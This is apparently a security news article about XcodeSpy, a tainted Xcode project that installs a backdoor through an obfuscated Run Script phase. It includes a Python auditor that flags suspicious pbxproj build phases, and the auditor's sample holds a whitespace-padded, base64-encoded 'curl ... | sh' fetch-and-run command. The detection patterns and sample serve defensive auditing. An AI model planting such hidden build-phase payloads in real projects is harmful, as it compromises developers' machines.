Hackers infecting Apple app developers with trojanized Xcode projects

Cybersecurity researchers on Thursday disclosed a new attack in which threat actors abuse Xcode as an attack vector to backdoor Apple platform developers, adding to a growing trend of targeting developers and security researchers with malicious projects.

The Xcode project, dubbed "XcodeSpy," is a tainted version of a legitimate open source project available on GitHub called TabBarInteraction, which developers use to animate iOS tab bars based on user interaction.

“XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor on the developer’s macOS computer along with a persistence mechanism,” SentinelOne researchers said.

Xcode is Apple’s integrated development environment (IDE) for macOS, which is used to develop software for macOS, iOS, iPadOS, watchOS and tvOS.

Earlier this year, Google's Threat Analysis Group uncovered a North Korean campaign targeting security researchers and exploit developers that involved sharing a Visual Studio project designed to load a malicious DLL on Windows systems.

The XcodeSpy project does something similar, except that this time the attacks single out Apple developers.

In addition to the original code, XcodeSpy contains an obfuscated Run Script that executes when the developer's build target is launched. The script contacts an attacker-controlled server to fetch a custom variant of the EggShell backdoor onto the development machine; the backdoor includes capabilities for recording from the victim's microphone and camera and for logging keystrokes.

"XcodeSpy takes advantage of a built-in feature of Apple's IDE which allows developers to run a custom shell script when launching an instance of their target application," the researchers said. "While the technique is easy to identify if searched for, new or inexperienced developers who are not aware of the Run Script feature are particularly at risk, since there is no indication in the console or debugger to alert them to the execution of the malicious script."
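The Run Script phase the researchers describe is not hidden anywhere exotic: Xcode stores it in the project's project.pbxproj file as a PBXShellScriptBuildPhase object whose `shellScript` string is handed to the configured shell on every build. That makes it cheap to audit a third-party project before opening it. The following Python script is an added example written for this article, not SentinelOne's tooling or code from the TabBarInteraction repository. It extracts every Run Script phase from a pbxproj file and applies a handful of heuristics (leading whitespace that pushes the command out of the editor's visible area, network or scripting tools, `eval`/base64 decoding, silenced output, backgrounding, and a one-level decode of any base64 blob). The sample project text, the placeholder URL `http://example.invalid/p` and the phase names are all constructed for the demo.

```python
"""Audit an Xcode project.pbxproj for suspicious Run Script build phases.
Added example; the sample project text at the bottom is constructed."""
import base64
import re
import string

# One pbxproj object: `<24-hex id> /* comment */ = { ... };`
_OBJECT_RE = re.compile(
    r'([0-9A-F]{24})\s*(?:/\*\s*(.*?)\s*\*/)?\s*=\s*\{(.*?)\n\s*\};', re.S)
# Quoted pbxproj string literal; backslash escapes are undone by _unescape().
_SHELL_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')
_NETWORK_RE = re.compile(r'\b(curl|wget|nc|ncat|nscurl|osascript)\b')
_EVAL_RE = re.compile(r'\b(eval|base64|xxd|openssl\s+enc)\b|\|\s*(ba|z)?sh\b')
_SILENCE_RE = re.compile(r'>\s*/dev/null|2>&1|&>\s*/dev/null')
_B64_RE = re.compile(r'[A-Za-z0-9+/]{20,}={0,2}')


def _unescape(s):
    """Undo pbxproj backslash escapes (\\n, \\t, \\" and \\\\)."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), s)


def extract_run_scripts(pbxproj):
    """Return every PBXShellScriptBuildPhase as {id, name, script}."""
    phases = []
    for obj_id, comment, body in _OBJECT_RE.findall(pbxproj):
        if 'isa = PBXShellScriptBuildPhase;' not in body:
            continue
        m = _SHELL_RE.search(body)
        phases.append({'id': obj_id, 'name': comment or 'Run Script',
                       'script': _unescape(m.group(1)) if m else ''})
    return phases


def _decoded_blobs(script):
    # Yield printable text hidden in base64 blobs inside a script.
    for blob in _B64_RE.findall(script):
        try:
            text = base64.b64decode(blob, validate=True).decode('ascii')
        except (ValueError, UnicodeDecodeError):
            continue
        if text and all(c in string.printable for c in text):
            yield text


def assess_script(script):
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    body = script.lstrip()
    lead = script[:len(script) - len(body)]
    # Whitespace padding pushes the real command below the visible area of
    # the Run Script pane, so the phase looks empty in the Xcode UI.
    if lead.count('\n') >= 10 or len(lead) >= 200:
        findings.append('leading whitespace padding hides script body')
    if _NETWORK_RE.search(script):
        findings.append('contacts network / scripting tool')
    if _EVAL_RE.search(script):
        findings.append('decodes or evals embedded commands')
    if _SILENCE_RE.search(script):
        findings.append('suppresses output')
    if body.rstrip().endswith('&'):
        findings.append('backgrounds itself')
    for payload in _decoded_blobs(script):
        findings.append(f'base64 payload decodes to {payload!r}')
        # Judge the decoded command by the same rules (one level deeper).
        findings.extend('in decoded payload: ' + f for f in assess_script(payload))
    return findings


def audit_pbxproj(pbxproj):
    """Map each Run Script phase name to its findings."""
    return {p['name']: assess_script(p['script']) for p in extract_run_scripts(pbxproj)}


def _pbx_string(s):
    """Escape a script the way Xcode writes it into project.pbxproj."""
    return (s.replace('\\', '\\\\').replace('"', '\\"')
             .replace('\n', '\\n').replace('\t', '\\t'))


# Constructed sample: one ordinary logging phase and one hostile phase whose
# command is pushed off-screen and wrapped in base64 (the URL is a placeholder).
BENIGN_SCRIPT = 'echo "Building ${PRODUCT_NAME} for ${CONFIGURATION}"\n'
_ENCODED = base64.b64encode(b'curl -s http://example.invalid/p | sh').decode()
MALICIOUS_SCRIPT = ('\n' * 40 + ' ' * 300
                    + f'eval "$(echo {_ENCODED} | base64 -D)" >/dev/null 2>&1 &\n')
SAMPLE_PBXPROJ = f'''/* Begin PBXShellScriptBuildPhase section */
		A1B2C3D4E5F60718293A4B5C /* Print Build Info */ = {{
			isa = PBXShellScriptBuildPhase;
			name = "Print Build Info";
			shellPath = /bin/sh;
			shellScript = "{_pbx_string(BENIGN_SCRIPT)}";
		}};
		0123456789ABCDEF01234567 /* Run Script */ = {{
			isa = PBXShellScriptBuildPhase;
			name = "Run Script";
			shellPath = /bin/sh;
			shellScript = "{_pbx_string(MALICIOUS_SCRIPT)}";
		}};
/* End PBXShellScriptBuildPhase section */
'''
```

To check a real project, read its `*.xcodeproj/project.pbxproj` into a string and pass it to `audit_pbxproj`; running it on `SAMPLE_PBXPROJ` reports the logging phase as clean and the second phase with every heuristic tripped, including the decoded `curl ... | sh` command. The heuristics are deliberately noisy (a legitimate SwiftLint phase will trip the silenced-output rule), so treat a hit as a prompt to read the script in the pbxproj rather than in the Xcode pane, where padding can hide it.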

SentinelOne said it identified two variants of the EggShell payload, with samples uploaded to VirusTotal from Japan on August 5 and October 13 of last year. Additional clues point to an unnamed U.S. organization that is said to have been targeted by this campaign between July and October 2020, and the researchers believe other developers, probably in Asia, were targeted as well.

Adversaries have previously resorted to tainted Xcode executables (known as XcodeGhost) to inject malicious code into iOS apps compiled with the infected Xcode without the developers' knowledge, then used the infected apps to collect information from devices once they were downloaded and installed from the App Store.

In August 2020, Trend Micro researchers discovered a similar threat that spread through modified Xcode projects which, when built, were configured to install a Mac malware called XCSSET that steals credentials, captures screenshots, exfiltrates sensitive data from messaging and note-taking apps, and can even encrypt files for ransom.

XcodeSpy, by contrast, takes a simpler route, since the goal appears to be to attack the developers themselves, although the ultimate objective behind the operation and the identity of the group behind it remain unclear.

"Targeting software developers is the first step in a successful supply chain attack. One way to do this is to abuse the development tools needed to carry out this work," the researchers said.

"It's quite possible that XcodeSpy is targeting a particular developer or group of developers, but there are other potential scenarios with such high casualties. Attackers could simply be looking for interesting targets and collecting data for future campaigns, or they could try to gather AppleID credentials for use in other campaigns using malicious software with valid Apple Developer code signatures."
